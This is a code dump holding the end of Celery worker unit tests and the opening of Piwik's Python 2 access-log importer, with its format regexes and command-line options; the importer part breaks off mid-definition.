def close(self):
self.closed = True
l.connection = Mock()
l._open_connection = lambda: Connection(obj=l)
l._green_pidbox_node()
l.pidbox_node.listen.assert_called_with(callback=l.on_control)
self.assertTrue(l.broadcast_consumer)
l.broadcast_consumer.consume.assert_called_with()
self.assertIsNone(l.connection)
self.assertTrue(connections[0].closed)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
init_callback = Mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
with self.assertRaises(KeyError):
l.start()
self.assertTrue(init_callback.call_count)
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
init_callback.reset_mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.connection = BrokerConnection()
l.consume_messages = Mock(side_effect=socket.error("foo"))
with self.assertRaises(socket.error):
l.start()
self.assertTrue(init_callback.call_count)
self.assertTrue(l.consume_messages.call_count)
def test_reset_connection_with_no_node(self):
l = MainConsumer(self.ready_queue, self.eta_schedule, self.logger)
self.assertEqual(None, l.pool)
l.reset_connection()
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker._shutdown_complete.set()
worker.logger = Mock()
return worker
@patch("celery.platforms.signals")
@patch("celery.platforms.set_mp_process_title")
def test_process_initializer(self, set_mp_process_title, _signals):
from celery import Celery
from celery import signals
from celery.app import _tls
from celery.concurrency.processes import process_initializer
from celery.concurrency.processes import (WORKER_SIGRESET,
WORKER_SIGIGNORE)
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
loader = Mock()
app = Celery(loader=loader, set_as_current=False)
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, "awesome.worker.com")
self.assertIn((tuple(WORKER_SIGIGNORE), {}),
_signals.ignore.call_args_list)
self.assertIn((tuple(WORKER_SIGRESET), {}),
_signals.reset.call_args_list)
self.assertTrue(app.loader.init_worker.call_count)
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
set_mp_process_title.assert_called_with("celeryd",
hostname="awesome.worker.com")
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = Mock()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
msg, args = worker.logger.error.call_args[0]
self.assertIn("KeyError", msg % args)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = Mock()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
xargs = worker.logger.debug.call_args[0]
fmt, arg = xargs[0], xargs[1]
self.assertEqual(30.0, arg)
self.assertIn("Next eta %s secs", fmt)
def test_process_task(self):
worker = self.worker
worker.pool = Mock()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
self.assertEqual(worker.pool.apply_async.call_count, 1)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyboardInterrupt("Ctrl+C")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(KeyboardInterrupt):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = SystemTerminate()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(SystemExit):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyError("some exception")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
worker1 = self.create_worker()
stc = Mock()
stc.start.side_effect = SystemTerminate()
worker1.components = [stc]
worker1.start()
self.assertTrue(stc.terminate.call_count)
worker2 = self.create_worker()
sec = Mock()
sec.start.side_effect = SystemExit()
sec.terminate = None
worker2.components = [sec]
worker2.start()
self.assertTrue(sec.stop.call_count)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
state.Persistent = Mock()
try:
worker = self.create_worker(state_db="statefilename")
self.assertTrue(worker._persistence)
finally:
state.Persistent = Persistent
def test_disable_rate_limits_solo(self):
worker = self.create_worker(disable_rate_limits=True,
pool_cls="solo")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_disable_rate_limits_processes(self):
try:
worker = self.create_worker(disable_rate_limits=True,
pool_cls="processes")
except ImportError:
raise SkipTest("multiprocessing not supported")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertTrue(worker.mediator)
self.assertNotEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock()]
worker.start()
for w in worker.components:
self.assertTrue(w.start.call_count)
worker.stop()
for component in worker.components:
self.assertTrue(w.stop.call_count)
def test_start__terminate(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock(), Mock()]
for component in worker.components[:3]:
component.terminate = None
worker.start()
for w in worker.components[:3]:
self.assertTrue(w.start.call_count)
self.assertTrue(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components[:3]:
self.assertTrue(component.stop.call_count)
self.assertTrue(worker.components[4].terminate.call_count)
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Piwik - free/libre analytics platform
#
# @link https://piwik.org
# @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: https://piwik.org/log-analytics/ and https://piwik.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or 2.7
#
import sys
if sys.version_info[0] != 2:
print('The log importer currently does not work with Python 3 (or higher)')
print('Please use Python 2.6 or 2.7')
sys.exit(1)
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import ssl
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
import textwrap
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff woff2 class swf css js xml robots.txt webp'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flac flv gz gzip hqx '
'ibooks jar json mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm rtf sea sit tar tbz '
'bz2 tbz tgz torrent txt wav webm wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
# user agents must be lowercase
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'pingdom.com_bot_',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
PIWIK_DEFAULT_MAX_ATTEMPTS = 3
PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
PIWIK_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
# nginx outputs malformed JSON w/ hex escapes when confronted w/ non-UTF input. we have to
# workaround this by converting hex escapes in strings to unicode escapes. the conversion is naive,
# so it does not take into account the string's actual encoding (which we don't have access to).
line = line.replace('\\x', '\\u00')
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
# Some ugly patchs ...
if key == 'generation_time_milli':
self.json[key] = int(float(self.json[key]) * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
def get_all(self,):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
def check_format_line(self, line):
return self.match(line)
def match(self,line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
def get_all(self,):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>\d+[-\d+]+',
'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\w*.:-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S*)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-method': '(?P<method>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
try:
file.seek(0)
except IOError:
pass
return
first_line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class ShoutcastFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'c-status': '(?P<status>\d+)',
'x-duration': '(?P<generation_time_secs>[.\d]+)'
})
def __init__(self):
super(ShoutcastFormat, self).__init__()
self.name = 'shoutcast'
def get(self, key):
if key == 'user_agent':
user_agent = super(ShoutcastFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(ShoutcastFormat, self).get(key)
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>[\w*.:-]+)\s+\S+\s+(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>[\w*.:-]+)\s+'
'(?P<userid>\S+)\s+\S+\s+\S+\s+\S+\s+"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>[0-9-]+)'
)
_ELB_LOG_FORMAT = (
'(?P<date>[0-9-]+T[0-9:]+)\.\S+\s+\S+\s+(?P<ip>[\w*.:-]+):\d+\s+\S+:\d+\s+\S+\s+(?P<generation_time_secs>\S+)\s+\S+\s+'
'(?P<status>\d+)\s+\S+\s+\S+\s+(?P<length>\S+)\s+'
'"\S+\s+\w+:\/\/(?P<host>[\w\-\.]*):\d+(?P<path>\/\S*)\s+[^"]+"\s+"(?P<user_agent>[^"]+)"\s+\S+\s+\S+'
)
_OVH_FORMAT = (
'(?P<ip>\S+)\s+' + _HOST_PREFIX + '(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
'shoutcast': ShoutcastFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'elb': RegexFormat('elb', _ELB_LOG_FORMAT, '%Y-%m-%dT%H:%M:%S'),
'nginx_json': JsonFormat('nginx_json'),
'ovh': RegexFormat('ovh', _OVH_FORMAT)
}
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
if needed, the config.inc.php.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Piwik. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" You may also import many log files at once (for example set log_file to *.log or *.log.gz)."
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Piwik Server Log Analytics: https://piwik.org/log-analytics/ "
" Found a bug? Please create a ticket in https://dev.piwik.org/ "
" Please send your suggestions or successful user story to hello@piwik.org "
)
# Basic auth user
option_parser.add_option(
'--auth-user', dest='auth_user',
help="Basic auth user",
)
# Basic auth password
option_parser.add_option(
'--auth-password', dest='auth_password',
help="Basic auth password",
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--debug-tracker', dest='debug_tracker', action='store_true', default=False,
help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If "
"using the log importer results in errors with the tracker or improperly recorded visits, this option can "
"be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the "
"[Tracker] debug_on_demand INI config to 1 in your Piwik's config.ini.php file."
)
option_parser.add_option(
'--debug-request-limit', dest='debug_request_limit', type='int', default=None,
help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the "
"output of a large log file."
)
option_parser.add_option(
'--url', dest='piwik_url',
help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net",
)
option_parser.add_option(
'--api-url', dest='piwik_api_url',
help="This URL will be used to send API requests (use it if your tracker URL differs from UI/API url), "
"eg. http://other-example.com/piwik/ or http://analytics-api.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Piwik",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Piwik, automatically create a new website in Piwik with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Piwik site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Piwik site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Piwik will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Piwik Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Piwik Super User password"
)
option_parser.add_option(
'--token-auth', dest='piwik_token_auth',
help="Piwik user token_auth, the token_auth is found in Piwik > Settings > API. "
"You must use a token_auth that has at least 'admin' or 'super user' permission. "
"If you use a token_auth for a non admin user, your users' IP addresses will not be tracked properly. "
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
" You may use the star character * "
" Example: --hostname=*domain.com"
" Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Piwik. "
" You must use the star character *. "
" Example: --exclude-path=*/admin/*"
" Can be specified multiple times. "
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude. Each path must contain the character * to match a string. (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-date-format', dest='log_date_format', default=None,
help="Format string used to parse dates. You can specify any format that can also be specified to "
"the strptime python function."
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't include it. All hits "
"will seem to come to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee https://piwik.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the piwik_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Piwik tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--add-download-extensions', dest='extra_download_extensions', default=None,
help="Add extensions that should be treated as downloads. See --download-extensions for more info."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
